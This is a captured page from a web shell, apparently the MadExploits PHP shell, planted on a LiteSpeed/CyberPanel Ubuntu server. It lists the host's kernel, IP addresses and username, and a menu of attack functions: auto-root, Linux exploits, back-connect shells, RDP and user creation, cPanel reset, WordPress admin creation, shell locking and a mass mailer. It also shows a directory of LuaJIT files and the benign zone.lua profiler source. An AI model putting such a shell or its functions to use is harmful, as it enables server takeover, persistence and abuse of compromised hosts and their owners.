Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
luajit-2.1.0-beta3 /
jit /
[ HOME SHELL ]
Name
Size
Permission
Action
bc.lua
5.49
KB
-rw-r--r--
bcsave.lua
17.91
KB
-rw-r--r--
dis_arm.lua
18.89
KB
-rw-r--r--
dis_arm64.lua
30.18
KB
-rw-r--r--
dis_arm64be.lua
619
B
-rw-r--r--
dis_mips.lua
13.45
KB
-rw-r--r--
dis_mips64.lua
706
B
-rw-r--r--
dis_mips64el.lua
717
B
-rw-r--r--
dis_mipsel.lua
715
B
-rw-r--r--
dis_ppc.lua
19.83
KB
-rw-r--r--
dis_x64.lua
712
B
-rw-r--r--
dis_x86.lua
32.05
KB
-rw-r--r--
dump.lua
19.71
KB
-rw-r--r--
p.lua
8.92
KB
-rw-r--r--
v.lua
5.65
KB
-rw-r--r--
vmdef.lua
7.22
KB
-rw-r--r--
zone.lua
1002
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zone.lua
---------------------------------------------------------------------------- -- LuaJIT profiler zones. -- -- Copyright (C) 2005-2017 Mike Pall. All rights reserved. -- Released under the MIT license. See Copyright Notice in luajit.h ---------------------------------------------------------------------------- -- -- This module implements a simple hierarchical zone model. -- -- Example usage: -- -- local zone = require("jit.zone") -- zone("AI") -- ... -- zone("A*") -- ... -- print(zone:get()) --> "A*" -- ... -- zone() -- ... -- print(zone:get()) --> "AI" -- ... -- zone() -- ---------------------------------------------------------------------------- local remove = table.remove return setmetatable({ flush = function(t) for i=#t,1,-1 do t[i] = nil end end, get = function(t) return t[#t] end }, { __call = function(t, zone) if zone then t[#t+1] = zone else return (assert(remove(t), "empty zone stack")) end end })
Close